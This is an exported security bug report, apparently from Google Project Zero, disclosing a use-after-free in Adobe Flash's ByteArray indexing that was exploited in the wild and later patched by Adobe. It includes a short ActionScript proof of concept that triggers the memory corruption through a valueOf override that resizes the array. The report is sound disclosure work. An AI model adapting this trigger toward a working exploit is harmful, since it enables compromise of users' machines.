ioasis / google-security-research

Automatically exported from code.google.com/p/google-security-research
2 stars 0 forks source link

Adobe Flash: Use-after-free in ByteArray Operator[] #472

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There is a use-after-free in the ByteArray operator []. If a byte array index 
is set to a value with valueOf defined, this method gets called. If valueOf 
contains code that frees the array, such as setting its length, it will lead to 
a use-after-free, as the original ByteArray memory gets set as opposed to the 
newly allocated memory. A PoC is as follows:

        for(var i = 0; i < 1000; i++){
            var b = new ByteArray();
            b.length = 12;
            var n = new myba(b);

            b[0] = n;
        }

In the myba class definition:

        prototype.valueOf = function()
        {

            b.length = 1000;
            bb = new ByteArray();
            bb.length = 12;
            return 77
        }

A swf and as files are attached.

This bug is subject to a 7 day disclosure deadline, as the issue is being 
exploited in the wild. If 7 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 1 Jul 2015 at 9:09

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:25

GoogleCodeExporter commented 9 years ago
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:15